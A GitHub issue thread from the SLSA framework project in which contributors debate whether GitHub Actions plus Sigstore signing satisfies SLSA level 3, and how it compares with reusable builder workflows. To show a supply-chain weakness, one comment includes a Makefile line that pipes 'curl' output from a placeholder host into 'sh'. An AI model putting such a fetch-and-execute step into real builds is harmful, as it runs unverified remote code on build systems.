slsa-framework / slsa

Supply-chain Levels for Software Artifacts
https://slsa.dev
Other
1.53k stars 221 forks source link

Applied ruling: does signing with GitHub+Sigstore satisfy SLSA 3? #464

Closed MarkLodato closed 2 years ago

MarkLodato commented 2 years ago

GitHub Actions + Sigstore can be used to sign artifacts with an X.509 certificate containing the workflow's identity (repository + path + branch/tag). This works by having the workflow request a GitHub Actions OpenID Connect (OIDC) token and then converting that to X.509 using Fulcio. It is not possible for a user to forge the corresponding fields in the X.509 certificate. For a concrete example, see Sigstore integration in the npm CLI (https://github.com/npm/rfcs/pull/626).

For the sake of simplicity, let's say that the "provenance" is an in-toto attestation that just contains a subject but no predicate. All of the provenance information is found in the X.509 certificate. (Note: This is not what is being proposed in the npm RFC.)

Question: Does this satisfy SLSA 3?

I believe the Build requirements are plainly satisfied, aside from the questions in #321.

What about the Provenance requirements?

Requirement Met?
Available Yes
Authenticated Yes, by verification via Sigstore
Service generated Yes, by GitHub Actions + Sigstore
Non-falsifiable Yes, the user cannot modify anything but the output hash (subject)
Identifies artifact Yes, subject
Identifies builder Yes, GitHub Actions (though it doesn't identify the runner, see #321)
Identifies build instructions (redundant with Identifies entry point, see #388)
Identifies source code Yes, the repository in Subject Alternative Name
Identifies entry point Yes, the path to the workflow within the Subject Alternative Name
Includes all build parameters Yes, if the event_name is not "workflow_dispatch", there are no parameters

By this analysis, this does indeed satisfy SLSA 3. Am I missing something? Any agreement or disagreement?

I ask because I'm having a trouble explaining the benefit of https://github.com/slsa-framework/slsa-github-generator over this, specifically in the context of the npm RFC above. If both are SLSA 3, why is the reusable workflow more secure?

/cc @mlieberman85 @laurentsimon @ianlewis

kommendorkapten commented 2 years ago

My $.02 on this:

What a trusted builder, audited and vetted by a trusted entity, provides is scalability around trust (this is not strictly related to SLSA, but I'll get to that). A "regular" workflow defined in the same repository as the code, does not have to be any less secure than the builder_go_slsa3.yaml. But from a consumer perspective (this could be a registry, build system or a developer) a reusable workflow allows me to create a fairly simple policy around what builders I trust to a given SLSA level. Compare this with every dependency using their own workflow (builder). Helpful here is that identity of the builder is encoded in the SAN in the X.509 Certificate, i.e not falsifiable by a developer.

So with a trusted builder, we get separation of concerns, the build and provenance generation is separated from the source code. The source code can be modified by the developer (any attempt to replace the builder will made be visible in the certificate), but not the trusted builder. If there is a policy around a specific builder defined in the source code repository, where a builder is audited and trusted, how would that look like? We can't rely on a commit SHA, as it will change with each commit, and there is no guarantee that the builder was not modified. For a trusted builder, an immutable identifier, such as a specific commit SHA can be audited and approved, and reused across an endless amount of source code repositories.

And who is in charge of creating the provenance? If it's a workflow in the source code repository (which the developer have access too), my understanding is that this breaks provenance/non-falsifiable and possibly even provenance/service-generated. I get that the initial information is not falsifiable, as it comes from the builder's ID token, and gets encoded into the cert. But this does IMHO, not give any guarantee about the real provenance of the created artifact. As the build job can freely pull from another source repo, and build from that.

asraa commented 2 years ago

Another small addition:

I ask because I'm having a trouble explaining the benefit of https://github.com/slsa-framework/slsa-github-generator over this, specifically in the context of the npm RFC above. If both are SLSA 3, why is the reusable workflow more secure?

Like @kommendorkapten mentioned, with a reusable workflow, the build and provenance is isolated from the maintainer. Yes, you can achieve "SLSA 3" for the input hash and an empty provenance statement, but no other information in your attestation is non-falsifiable.

For example, without a reusable workflow, the contents of your buildConfig are falsifiable by the maintainer of the project.

And who is in charge of creating the provenance? If it's a workflow in the source code repository (which the developer have access too), my understanding is that this breaks provenance/non-falsifiable and possibly even provenance/service-generated.

Agreed. Basically if any field are present beyond the information in the Fulcio certificate and the Subject name, then we won't satisfy SLSA 3 in my opinion. Likewise, as mentioned, this provides no strong guarantee on the artifact "recipe" and only provides a "SLSA 3" style endorsement of the artifact. The build step could have performed a curl to retrieve any artifact.

Basically, I think an empty SLSA provenance with no predicate is effectively the same as a raw signature.

provides is scalability around trust (this is not strictly related to SLSA, but I'll get to that).

+1, I suppose the value of using "provenance generator" workflows (rather than "builder" workflows that are aware of the build) would be that it provides a method of consumer policy verification against a known set of builders and easy maintenance for the developers.

laurentsimon commented 2 years ago

The builder is SLSA level 3, but the resulting artifact may not be due to self-hosted runners. During verification, you'd need to fetch the workflow and verify that it's not using self-hosted runners.

We discussed getting rid of intoto and adding a hash into the certificate in https://github.com/sigstore/fulcio/issues/475, but this is limited because the OIDC token cannot pack a lot of information and we don't control it.

So it depends on use case:

If you care only about binding a package to a repos (provenance level 3) and you don't mind x509-formatted attestation, then using the x509 cert as attestation is enough. (We do that in scorecard Action to stream the results back to our servers: but we parse the workflow and verify there's no self-hosted runners, no use of custom containers or services, etc). In terms of adoption, this is ideal because it suffices for a CLI (npm, maven) to sign when it detects it's running in GitHub workflow. There is no changes needed for maintainers

The re-usable workflow has the following advantages:

The two approaches seem complimentary. The former gives you the provenance level 3 (build level 3 is contingent on parsing the workflow during verification, which is cumbersome for egress rules and latency), the latter gives flexibility and finer-grained information for build level 3 / re-builders / policies.

asraa commented 2 years ago

you get level 3 for build without the need to fetch / parse a workflow

Big +1 here. The value of having a SLSA 3 attestation here is that we can trust properties of the build and provenance without needing to fetch or parse the workflow, and being aware of GH or other CI/CD systems themselves.

You may be able to prove SLSA 3 compliance from an empty predicate by doing some work. However, it means they must fetch, parse, and validate the properties of SLSA themselves. The real value of these builders is that customers CAN use the trusted information packaged to them in the SLSA provenance to verify policy, re-build, or verify properties WITHOUT figuring them out themselves, which is almost unachievable in generality for every way people may build artifacts.

MarkLodato commented 2 years ago

Thanks all! That's very helpful to clarify the benefits of the reusable workflow over the raw OIDC/Sigstore model.

But I'm going to be a bit pedantic in order to nail down the bare minimum to satisfy SLSA 3. As I read the v0.1 requirements, I don't see anything that precludes a workflow from fetching and building other sources, nor do I see anything that would require fetching and parsing the workflow to verify.

Let's consider a concrete but hypothetical example: NPM package lodash is expected to be built from https://github.com/lodash/lodash. Suppose that it contains a GitHub Actions workflow .github/workflows/release-build.yaml that actually fetches the sources from some other git repo and doesn't use any code in the lodash repo itself.

What specific SLSA 3 requirement would that fail to meet, and why would using generator_generic_slsa3.yml make a difference?

I am asking this to validate whether the SLSA requirements are properly designed. If the consensus is that this feels wrong, then perhaps we should add some other requirement to differentiate between these two types of builders. If the consensus is that this is acceptable, and that there is naturally some variance in guarantees between builders, that's OK too - it's good to document. Or maybe I'm just missing something that's already there. :smile:

laurentsimon commented 2 years ago

It does not violate the existing SLSA requirements. I think the question you are asking is generally a source of confusion because the builder cannot assert that the source code was actually "used" to compile, just that the entrypoint of the source code was used. Depending at which level of abstraction the builder operates, you get more or less visibility into the underlying commands... and so you also get more or less guarantees.

You could think of the x509 builder as a first-stage builder, which is limited but sets the "root of trust". The re-usable workflow would be a second-stage builder (like a full OS, it's richer and has more functionalities).

I don't know if this warrants a change in the SLSA specs though. Because it's a continuous source of confusion, maybe this is something to think about in the SLSA description, ie that all builders are not equal. It may be useful to capture these distinctions on slsa.dev, but maybe not in the specs.

Would love to hear others' thoughts.

kommendorkapten commented 2 years ago

What specific SLSA 3 requirement would that fail to meet, and why would using generator_generic_slsa3.yml make a difference?

I think the first-stage and second-stage builder is a great analogy to use here. For a first-stage/X.509 builder any workflow/build definition that is "verifiably derived from text file definitions stored in a version control system" can be used. A SLSA level 3 attestation for these kinds of builders must bare-minimum (x509 cert + artifact digest), as I understand.

With a second stage builder, we can get richer attestations, as the provenance generation can be isolated from the source code repository, so we can now put more data into it without violating the "non-falsifiable" requirement.

While they are both SLSA level 3, the discussion boils down to the usability of them, and how to define policies. As policies most likely will be very different for e.g. a vendor, OSS and the enterprise use-case. I guess it would be hard to tighten up the language in the SLSA spec to accommodate the need for all? Would it be worth extending the spec on policies in SLSA (an appendix or similar), and talk more about how different builders may operate and so provide more guidelines for the downstream verifiers? And maybe talk more about different builders and what they actually attest to?

Another question that is confusing for me from the SLSA spec though: build/bulid as code.

The build definition and configuration executed by the build service is verifiably derived from text file definitions stored in a version control system.

Verifiably derived can mean either fetched directly through a trusted channel, or that the derived definition has some trustworthy provenance chain linking back to version control.

Consider a GitHub Actions file that have the following job:

name: Example build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: make foo

And the Makefile looks like this:

foo:
    curl http://unsecure.example.com | sh

This is an example scenario we have been discussing internally a lot. You get the X.509 details in your provenance, but the rest is useless from a verification scenario. So we have inclined to reason more about second-stage builders, as we think is more usable in general, for the OSS use-case.

With that said, I'm not trying to claim that we believe a generic SLSA 3 builder is universally secure, but it moves the needle, and with language specific builders, like the builder_go_slsa3.yml and possibly even integrations with the tool-chain, we can make stronger claims and so simplify the policy construction.

MarkLodato commented 2 years ago

I think the question you are asking is generally a source of confusion because the builder cannot assert that the source code was actually "used" to compile

Very insightful! It didn't occur to me until you said it. Agreed. Filed #465.

You could think of the x509 builder as a first-stage builder [...]. The re-usable workflow would be a second-stage builder

I agree that it would be valuable to distinguish between these two types of builders. I suggest that we try to define a precise term for this rather than offering general guidance, so I filed #466. If you disagree please comment!

MarkLodato commented 2 years ago

I'm going to mark this issue as resolved since I think we have our answer, plus follow-up issues (#465 and #466).